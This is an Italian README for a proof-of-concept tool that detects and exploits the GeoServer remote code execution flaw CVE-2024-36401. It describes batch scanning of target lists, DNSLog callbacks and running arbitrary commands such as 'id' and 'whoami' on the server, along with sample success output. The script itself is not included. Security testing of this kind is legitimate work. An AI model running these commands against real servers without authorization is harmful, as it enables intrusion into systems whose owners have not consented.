
Questo script è uno strumento di rilevamento PoC (Proof of Concept) sviluppato per la vulnerabilità di esecuzione di codice remoto in GeoServer (CVE-2024-36401). Tale vulnerabilità consente a un aggressore di eseguire comandi arbitrari sul server target mediante la costruzione di richieste specifiche.
⚠️ Avvertenza: Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e a test autorizzati legalmente. Non utilizzarlo per scopi illeciti. L'utente si assume ogni responsabilità legale.
README Versione: [English | Italiano]
Questo script è uno strumento di rilevamento PoC (Proof of Concept) sviluppato per la vulnerabilità di esecuzione remota di codice (CVE-2024-36401) in GeoServer. Tale vulnerabilità consente a un attaccante di eseguire comandi arbitrari sul server di destinazione attraverso la costruzione di richieste specifiche.
Assicurati che il tuo ambiente di esecuzione abbia installato le seguenti dipendenze:
requestslxmlÈ possibile installare le dipendenze necessarie con il seguente comando:
pip install requests lxml
python poc.py -u http://target.com -d dnslog.example.com
Oppure specificare il comando da eseguire:
python poc.py -u http://target.com -c "touch /tmp/vulntest"
Prepara un file di testo contenente più URL target (uno per riga):
python poc.py -uf targets.txt -d dnslog.example.com
Oppure specificare un comando:
python poc.py -uf targets.txt -c "id"
Istruzioni dettagliate: Documento di istruzioni dettagliate
⚠️ Nota: I parametri
-de-cnon possono essere utilizzati contemporaneamente.
[INFO] Sono stati raccolti 3 Typenames validi, inizio rilevamento della vulnerabilità
[INFO] Target: http://example.com
[INFO] Comando eseguito: whoami
[INFO] Indirizzo DNSLOG:
[INFO] Tentativo con typeName: topp:states -> whoami
[+] Comando apparentemente eseguito con successo! Target: http://example.com Comando: whoami
-c./geoserver/wfs.I contributi sono benvenuti! Puoi aprire Issue o Pull Request per migliorare questo progetto.
Questo progetto è concesso in licenza con Licenza MIT. Puoi modificarlo, distribuirlo e utilizzarlo commercialmente liberamente, ma devi mantenere l'avviso di copyright.
| Parametro | Descrizione |
|---|
-u, --url | Specifica l'indirizzo di un singolo target |
-uf, --url-file | Specifica il percorso di un file contenente URL multipli |
-d, --dnslog | Specifica l'indirizzo DNSLog |
-c, --command | Specifica il comando da eseguire sul sistema target (ad esempio: whoami, id, curl, ecc.) |